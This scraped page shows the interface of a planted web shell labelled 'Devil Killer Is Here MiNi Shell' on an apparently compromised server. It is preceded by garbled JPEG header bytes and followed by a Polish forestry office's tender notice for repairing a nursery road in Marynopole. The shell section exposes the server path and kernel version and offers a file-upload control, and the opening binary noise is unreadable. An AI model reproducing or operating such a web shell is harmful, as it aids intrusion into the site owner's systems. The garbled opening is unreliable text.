JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230613/0025739701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi wewnętrznej nr 220/916 na terenie szkółki Marynopole </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO GOŚCIERADÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830017736</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gościeradów Folwark 1D</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gościeradów Ukazowy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-275</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">goscieradow@lublin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://goscieradow.lublin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi wewnętrznej nr 220/916 na terenie szkółki Marynopole </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b9e6ec6a-09c5-11ee-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00257397</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00021773/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Remont drogi wewnętrznej nr 220/916 na terenie szkółki Marynopole</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b9e6ec6a-09c5-11ee-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu, z<br/>wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pomocą<br/>poczty elektronicznej - email: goscieradow@lublin.lasy.gov.pl lub za pośrednictwem formularzy do komunikacji dostępnych w<br/>zakładce „Formularze” („Formularze do komunikacji”).<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)<br/>(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1, z późn.zm. – dalej „RODO”) Zamawiający informuje, iż administratorem danych<br/>osobowych jest: Nadleśnictwo Gościeradów<br/>2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia.<br/>4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające<br/>upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności.<br/>5. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego<br/>postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki<br/>określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>6. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w<br/>oparciu o przepisy PZP, a także ustawy<br/>o dostępie do informacji publicznej.<br/>7. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą<br/>przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie<br/>zamówienia publicznego.<br/>8. Niezależnie od postanowień pkt 21.7. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane<br/>osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>9. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać<br/>przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne i konsultingowe.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.19.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 355200 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont drogi leśnej w szkółce leśnej w <br/> Marynopolu (nr inwent. 220/916) na odcinku 603mb o szerokości 3,2m wraz <br/> ze zjazdami i powierzchniami technologicznymi. Powierzchnia drogi głównej <br/> i zjazdów wynosi około 2948 m2, natomiast powierzchnie technologiczne <br/> wynoszą około 1742 m2, łącznie 4690 m2. Powierzchnia obrukowań na <br/> rowach wynosi koło 8 m2. Zakres remontu obejmuje:<br/> - oczyszczenie istniejącej nawierzchni wykonanej z kruszywa z pozostałości <br/> części organicznych,<br/> - wykonanie profilowania na całej powierzchni drogi wraz z nadaniem <br/> spadków poprzecznych i podłużnych, <br/> - uzupełnienie zagłębień i dołów w drodze i powierzchniach <br/> technologicznych materiałem kamiennym frakcji 0/12 do 0/31,5 wraz z <br/> mechanicznym zagęszczeniem,<br/> - wykonanie skropienia asfaltem powierzchni przed ułożeniem nakładki z <br/> mieszanek asfaltowych,<br/> - wykonanie nakładki z mieszanki AC11S grubości 6cm na całej powierzchni <br/> objętej remontem,<br/> - wykonanie brukowania z kostki betonowej w miejscach ujścia wody <br/> opadowej do rowów odparowujących. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2,5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) Cena – z wagą 60,0 %,<br/>2) Przedłużony okres nieodpłatnej gwarancji jakości do 5 lat - z wagą 40.0 %,<br/>2. Sposób obliczania punktów:<br/>1) W ramach kryterium „Cena (C)” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x100 pkt x 60%<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w ofercie (załącznik nr 2do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego<br/>Ogłoszenie nr 2023/BZP 00245012/01 z dnia 2023-06-02<br/>2023-06-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) Kryterium „przedłużony okres nieodpłatnej gwarancji jakości do 5 lat (G)”<br/>Zgodnie z pkt. 3.1 ppkt 6) SWZ Zamawiający zastrzega, że okres nieodpłatnej gwarancji jakości nie może być krótszy niż 3 lata,<br/>licząc od dnia końcowego odbioru robót.<br/>W ramach kryterium „przedłużony okres nieodpłatnej gwarancji jakości do 5 lat (G)”, Wykonawca otrzyma punkty, gdy zadeklaruje w<br/>formularzu ofertowym wydłużenie okresu gwarancji do 5 lat. Ocena ofert w tym kryterium zostanie dokonana w następujący sposób:<br/>• Gwarancja poniżej 3 lat: oferta zostanie odrzucona.<br/>• Gwarancja = 3 lata: oferta otrzyma 0 (zero) punktów.<br/>• Gwarancja = 5 lat i powyżej: oferta otrzyma 40,0 (G) punktów.<br/>okres gwarancji oferty badanej nie krótszy niż<br/>3 lata i nie dłuższy niż 5 lat<br/>okres gwarancji (G) = --------------------------------------------------------------<br/>najdłuższy okres gwarancji spośród złożonych<br/>ofert ale nie krótszy niż 3 lata i nie dłuższy niż 5 lat<br/>Wykonawca, który nie zadeklaruje /nie złoży podpisu/ udzielenia gwarancji, w tym kryterium otrzyma 0 pkt. W takiej sytuacji,<br/>Zamawiający uzna, że Wykonawca zapewnia minimalną długość okresu gwarancji wymaganą przez Zamawiającego.<br/>Wskazanie okresu gwarancji krótszego niż 3 lata, skutkować będzie odrzuceniem oferty przez Zamawiającego - jako niezgodnej z<br/>treścią SWZ.<br/>Zamawiający przyzna punkty maksymalnie za 5 lat gwarancji, dalsze wydłużanie tego terminu nie będzie miało wpływu na ocenę<br/>ofert. W przypadku zaoferowania okresu gwarancji na okres dłuższy niż 5 lat, do oceny w ramach kryterium oceny ofert przyjęty<br/>zostanie 5 letni okres gwarancji. Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do samodzielnej<br/>realizacji kluczowych części zamówienia w Ofercie (załącznik nr 2 do SWZ). Brak wskazania w ofercie przyjęcia przez Wykonawcę<br/>zobowiązania, o którym mowa w zdaniu poprzednim będzie uznawane jako nieprzyjęcie takiego zobowiązania, a oferta Wykonawcy<br/>uzyska 0 pkt w ramach niniejszego kryterium oceny ofert. Oferta Wykonawcy, który zaciągnie takie zobowiązanie otrzyma 40 pkt.<br/>3) Niniejsze zamówienie zostanie udzielone temu Wykonawcy, którego oferta uzyska<br/>najwyższą liczbę punktów w ostatecznej ocenie punktowej obliczonej wg wzoru:<br/>Ocena = C + G , gdzie:<br/>C - liczba punktów w kryterium „Cena oferty”<br/>G - liczba punktów w kryterium „Przedłużony okres gwarancji do 5 lat ”<br/>Uzyskana liczba punktów w ramach kryterium zaokrąglana będzie do drugiego miejsca po przecinku. Po tak obliczonej ilości<br/>punktów zostanie ustalona kolejność ofert, w tym oferta najkorzystniejsza.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużony okres gwarancji do 5 lat</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania<br/>warunku udziału w postępowaniu w odniesieniu do warunku dot. zdolności<br/>ekonomicznej.<br/>2) zdolności technicznej lub zawodowej:<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony,<br/>jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat od dnia w którym<br/>upływa termin składania ofert (a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie): zrealizował (ukończył) co najmniej 2<br/>(dwie) roboty budowlane odpowiadającą swoim rodzajem robotom<br/>budowlanym stanowiącym przedmiot zamówienia (przez robotę<br/>budowlaną rozumie się wykonywanie prac na podstawie umowy,<br/>polegające na budowie i/lub przebudowie i/lub remoncie dróg) o<br/>wartości co najmniej: 250 000,00 zł brutto, odpowiednio potwierdzona,<br/>że została wykonana w sposób należyty.<br/>b) Odnośnie zdolności zawodowej warunek ten, w zakresie osób<br/>skierowanych przez wykonawcę do realizacji zamówienia zostanie<br/>uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub<br/>będzie dysponować: na czas realizacji zamówienia, co najmniej:<br/> jedną osobą odpowiedzialną za kierowanie robotami budowlanymi<br/>(kierownik budowy) posiadającą uprawnienia budowlane do sprawowania<br/>samodzielnych funkcji technicznych w budownictwie zgodnie z ustawą<br/>z dnia 7 lipca 1994 r. Prawo budowlane i rozporządzeniem Ministra<br/>Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania<br/>zawodowego do wykonywania samodzielnych funkcji technicznych<br/>w budownictwie (Dz. U. z 2019 r., poz. 831) w specjalności drogowej<br/>lub odpowiadające im ważne uprawnienia budowlane wydane na<br/>podstawie przepisów obowiązujących w chwili ich uzyskania, a które<br/>uprawniają do pełnienia funkcji kierownika budowy przy wykonywaniu<br/>robót budowlanych objętych przedmiotem zamówienia.<br/>Zamawiający, na zasadach określonych w ustawie z dnia 22 grudnia 2015 r.<br/>o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz.U. z 2021 r., poz. 1646 ze zm.), uzna<br/>obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub<br/>państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron<br/>umowy o Europejskim Obszarze Gospodarczym, którzy nabyli w tych państwach,<br/>poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe wymagane na ww.<br/>stanowisko, jeżeli kwalifikacje te swym zakresem będą odpowiadały uprawnieniom<br/>opisanym powyżej umożliwiając pełnienie funkcji kierownika budowy przy<br/>wykonywaniu robót budowlanych objętych przedmiotem zamówienia.<br/>3) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego<br/>warunku udziału w postępowaniu.<br/>4) uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego<br/>warunku udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)Wyk. o którym mowa w art.125 ust.1 PZP potwierdz. brak podstaw wykluczenia i spełnienie warunków udziału w postępowania (zał nr 3 do<br/>SWZ)<br/>b) wykaz robót bud. wyk. nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podm., na rzecz których roboty te zostały wykonane<br/>(wzór wykazu wykonanych robót budowlanych stanowi<br/>zał nr 4 do SWZ).<br/>c) dowody, że wskazane przez Wyk. rob.bud. na potwierdz. spełnienia warunku udziału w postępowaniu dot. zdolności tech. lub<br/>zawod. w zakresie doświadczenia zostały wykonane należycie. Dowodami, o których mowa powyżej są referencje bądź inne dok.<br/>sporz. przez podmiot,<br/>na rzecz którego rob. bud. zostały wykonane, a jeżeli Wyk.<br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dok. – inne odpowiednie dok.<br/>d) wykaz osób, skierowanych przez Wyk. do realizacji zam. publiczn.,<br/>w szczególności odp. za kierowanie rob. bud., wraz z inf. i na temat ich kwalifikacji zawod., posiadanych uprawnień, doświadczenia i<br/>wykształcenia, niezbędnych do wykonania zam. publ. a także zakresu wyk. przez nie czynności oraz inf. o podstawie do<br/>dysponowania tymi osobami (wzór wykazu osób skierowanych przez wykonawcę do realizacji zamówienia stanowi zał nr 5 do SWZ),<br/>e) inf. z KRK w zakresie:(a) art. 108 ust. 1 pkt 1 i 2 PZP,(b) art. 108 ust. 1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o<br/>zam. publiczne tytułem środka karnego - sporządzoną nie wcześniej niż 6 mies. przed jej złożeniem,<br/>f) oświadczenie Wyk., w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz.U. 2021 poz. 275 ), z innym Wyk., który złożył<br/>odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitał. wraz z dok. lub inf. potw.<br/>przygotowanie oferty lub oferty częściowej niezależnie od innego Wyk. należącego do tej samej grupy kapitał. - (wzór oświadczenia<br/>Wyk. w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy kapitałowej stanowi zał nr 6 do<br/>SWZ),<br/>g) zaświadcz. właśc. naczelnika urzędu skarbowego potwierdz.,<br/>że Wyk. nie zalega z opłacaniem podatków i opłat, w zakresie art. 109<br/>ust.pkt 1) PZP, wyst. nie wcześniej niż 3 mies. przed jego złożeniem,<br/>a w przypadku zalegania z opłaceniem podatków i opłat wraz z zaświadcz.<br/>dok. potwierdzające, że przed upływem terminu składania ofert Wyk. dokonał płatności należnych podatków wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>h) zaświadcz. właściwej terenowej jednostki org. ZUS 